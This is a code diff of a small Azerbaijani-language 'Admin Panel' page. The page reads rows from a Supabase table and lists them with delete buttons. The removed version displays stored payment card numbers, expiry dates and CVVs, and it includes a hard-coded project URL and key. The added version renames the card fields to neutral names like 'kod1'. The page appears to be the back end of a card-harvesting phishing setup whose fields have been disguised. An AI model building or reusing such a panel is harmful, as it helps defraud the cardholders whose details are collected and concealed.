--- a/admin.html
+++ b/admin.html
@@ -1,78 +1,62 @@
 <!DOCTYPE html>
-<html lang="az">
+<html>
 <head>
 <meta charset="UTF-8">
-<meta name="viewport" content="width=device-width, initial-scale=1.0">
-<title>Admin Panel</title>
-
+<title>Admin</title>
 <style>
-body{
-  background:#f4f6f9;
-  font-family:Arial, sans-serif;
-  padding:40px;
+body{background:#f4f6f9;font-family:Arial;padding:40px;}
+.item{
+background:white;
+padding:15px;
+margin-bottom:10px;
+border-radius:8px;
+box-shadow:0 5px 15px rgba(0,0,0,0.1);
 }
-
-h1{
-  margin-bottom:30px;
-}
-
-.card{
-  background:white;
-  padding:20px;
-  border-radius:10px;
-  margin-bottom:15px;
-  box-shadow:0 5px 15px rgba(0,0,0,0.08);
-}
-
 button{
-  background:#ff4d4d;
-  color:white;
-  border:none;
-  padding:8px 14px;
-  border-radius:6px;
-  cursor:pointer;
+background:red;
+color:white;
+border:none;
+padding:6px 12px;
+border-radius:6px;
+cursor:pointer;
 }
 </style>
 </head>
-
 <body>
 
-<h1>Admin Panel</h1>
+<h2>Admin Panel</h2>
 <div id="list"></div>
 
 <script type="module">
 import { createClient } from "https://esm.sh/@supabase/supabase-js@2"
 
-const supabaseUrl = "https://gkrfcoyleewxrxbfdunq.supabase.co"
-const supabaseKey = "sb_publishable_E1QDjV9fAt2IaoI3h7G9Iw_hIiSaAFH"
-
-const supabase = createClient(supabaseUrl, supabaseKey)
+const supabaseUrl="BURAYA_URL"
+const supabaseKey="BURAYA_KEY"
+const supabase=createClient(supabaseUrl,supabaseKey)
 
 async function load(){
-  const { data } = await supabase
-  .from("messages")
-  .select("*")
-  .order("id",{ascending:false})
+const {data}=await supabase.from("mesajlar")
+.select("*").order("id",{ascending:false})
 
-  const container = document.getElementById("list")
-  container.innerHTML=""
+const list=document.getElementById("list")
+list.innerHTML=""
 
-  data.forEach(item=>{
-    const div=document.createElement("div")
-    div.className="card"
-    div.innerHTML=`
-      <p><b>Kart:</b> ${item.number}</p>
-      <p><b>Tarix:</b> ${item.expiry}</p>
-      <p><b>CVV:</b> ${item.cvv}</p>
-      <button onclick="remove(${item.id})">Sil</button>
-    `
-    container.appendChild(div)
-  })
+data.forEach(i=>{
+const div=document.createElement("div")
+div.className="item"
+div.innerHTML=`
+${i.kod1}<br>
+${i.kod2}<br>
+${i.kod3}<br>
+<button onclick="sil(${i.id})">Sil</button>
+`
+list.appendChild(div)
+})
 }
 
-window.remove = async function(id){
-  await supabase.from("messages").delete().eq("id",id)
-  load()
+window.sil=async function(id){
+await supabase.from("mesajlar").delete().eq("id",id)
+load()
 }
 
 load()
